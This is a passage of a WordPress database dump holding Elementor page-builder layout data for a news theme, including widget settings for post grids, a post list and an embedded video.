ze_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"sxv5g6k\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=qV8zMH-qeBc\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"2\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1322,463,'_elementor_version','0.4'),(1323,463,'_elementor_css','a:3:{s:4:\"time\";i:1508911603;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1325,464,'_elementor_edit_mode','builder'),(1326,464,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widget